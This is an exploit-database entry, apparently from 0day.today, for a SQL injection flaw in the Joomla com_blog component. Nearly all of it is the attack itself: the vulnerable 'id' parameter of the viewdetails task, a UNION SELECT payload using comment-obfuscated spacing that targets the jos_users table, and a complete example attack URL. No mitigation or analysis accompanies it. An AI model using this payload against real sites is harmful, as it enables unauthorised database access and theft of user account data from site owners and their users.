id: 11266
date: 03/11/2010
title: Joomla Component com_blog SQL Injection Vulnerability
author: DevilZ TM
cves: 

=====================================================
Joomla Component com_blog SQL Injection Vulnerability
=====================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/*



#  0day.today [2023-03-26]  #